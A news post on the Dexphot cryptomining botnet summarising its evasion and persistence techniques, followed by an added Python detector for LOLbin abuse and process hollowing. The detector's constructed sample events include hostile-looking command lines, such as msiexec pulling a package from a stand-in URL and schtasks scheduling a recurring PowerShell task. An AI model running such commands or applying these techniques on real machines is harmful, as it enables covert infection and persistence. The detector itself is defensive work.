
Dexphot malware infected more than 80,000 machines – Hacker

Posted on 11/28/2019 by sysdvd

Microsoft researchers have described the Dexphot malware, which has been attacking Windows machines since the fall of 2018. Its activity peaked in June 2019, when more than 80,000 systems were part of the botnet. Experts now say that Dexphot's activity is declining, partly thanks to the countermeasures they have taken.

The main goal of Dexphot has always been cryptocurrency mining for the enrichment of its operators. But despite these mundane goals, researchers note that its authors used sophisticated techniques, and the malware itself was far from simple. Many of the techniques it uses are more often found when studying the work of "government hackers" than in just another miner.

Dexphot was a second-stage payload: it infected computers already infected with the ICLoader malware, which got onto systems bundled with various software packages or when users downloaded and installed cracked or pirated software.

Interestingly, the Dexphot installer was the only part of the malware written to disk, and only for a short time. For its other files and operations Dexphot used fileless techniques, running everything in the computer's memory, which made its presence on the system invisible to classic antivirus solutions that rely on signatures.

Dexphot also used the LOLbins (living off the land binaries) technique, using legitimate Windows processes to execute malicious code rather than launching its own executables and processes. According to Microsoft, the malware regularly abused msiexec.exe, unzip.exe, rundll32.exe, schtasks.exe and powershell.exe. By running its malicious code through these processes, Dexphot became practically indistinguishable from other local applications that use the same utilities to do their job.

In addition, Dexphot used polymorphism: its operators changed the file names and URLs used in the infection chain every 20-30 minutes. By the time antivirus solutions had detected a pattern in the Dexphot infection chain, it had already changed, allowing Dexphot to stay one step ahead.

Since no malware goes unnoticed forever, Dexphot's developers also took care of persistence on the system. The malware used process hollowing: it launched two legitimate processes (svchost.exe and nslookup.exe), hollowed out their contents and ran malicious code under their guise. These components, disguised as legitimate Windows processes, made sure that all parts of the malware were up and running and reinstalled the malware if necessary.

Additionally, Dexphot used a series of scheduled tasks (regularly changing their names) so that the victim was re-infected filelessly after each system reboot or every 90 or 110 minutes. This also made it possible to regularly update the malware on all infected hosts: every time one of the tasks ran, the file was downloaded from the attackers' server, so they could make changes to it.
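As an added example (not code from the article or from Microsoft), here is a small detector run over process-creation events that looks for the two behaviours described above: the LOLbins the article names being invoked with suspicious arguments (a URL for msiexec, a DLL in a temp directory for rundll32, a short-interval task for schtasks), and svchost.exe or nslookup.exe being spawned by an unexpected parent, which is how hollowed copies usually stand out. The event format, the argument patterns and the sample events are all constructed for this example; the only fact taken from the page is the list of abused and hollowed processes.

```python
import re

# Heuristic patterns, chosen for this example, for the LOLbins the article names.
LOLBIN_RULES = {
    "msiexec.exe": re.compile(r"https?://", re.I),              # package pulled from a URL
    "rundll32.exe": re.compile(r"\\(temp|appdata)\\", re.I),    # DLL run from a scratch dir
    "powershell.exe": re.compile(r"-enc|hidden|downloadstring", re.I),
    "schtasks.exe": re.compile(r"/create.*/sc\s+minute", re.I), # task re-run every N minutes
}
# Processes the article says were hollowed. svchost.exe is normally started by
# services.exe; a copy spawned by a LOLbin stage is worth a closer look.
HOLLOW_TARGETS = {"svchost.exe", "nslookup.exe"}
EXPECTED_PARENT = {"svchost.exe": {"services.exe"}}

def parse_events(text):
    """Parse constructed 'time|parent|image|cmdline' lines into event dicts."""
    events = []
    for line in text.strip().splitlines():
        time, parent, image, cmdline = line.split("|", 3)
        events.append({"time": time, "parent": parent.lower(),
                       "image": image.lower(), "cmdline": cmdline})
    return events

def analyze(events):
    """Return (kind, image, detail) findings: LOLbin abuse and hollowing suspects."""
    findings = []
    for ev in events:
        rule = LOLBIN_RULES.get(ev["image"])
        if rule and rule.search(ev["cmdline"]):
            findings.append(("lolbin", ev["image"], ev["cmdline"]))
        if ev["image"] in HOLLOW_TARGETS:
            allowed = EXPECTED_PARENT.get(ev["image"])
            if (allowed and ev["parent"] not in allowed) or ev["parent"] in LOLBIN_RULES:
                findings.append(("hollow-suspect", ev["image"], "parent=" + ev["parent"]))
    return findings

# Constructed sample events (not real Dexphot telemetry) modelled on the chain above.
SAMPLE_EVENTS = """\
10:00|explorer.exe|msiexec.exe|msiexec.exe /i http://example.invalid/pkg-a1.msi /q
10:01|msiexec.exe|rundll32.exe|rundll32.exe C:\\Users\\bob\\AppData\\Local\\Temp\\x.dll,Start
10:02|rundll32.exe|svchost.exe|svchost.exe
10:02|rundll32.exe|nslookup.exe|nslookup.exe
10:03|svchost.exe|schtasks.exe|schtasks.exe /create /sc minute /mo 90 /tn Upd /tr powershell.exe
10:05|services.exe|svchost.exe|svchost.exe -k netsvcs
10:06|explorer.exe|notepad.exe|notepad.exe report.txt
"""

if __name__ == "__main__":
    for kind, image, detail in analyze(parse_events(SAMPLE_EVENTS)):
        print(kind, image, detail)
```

On the sample above the detector reports three LOLbin findings and two hollowing suspects, while the legitimate svchost.exe started by services.exe and the notepad.exe launch produce nothing.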
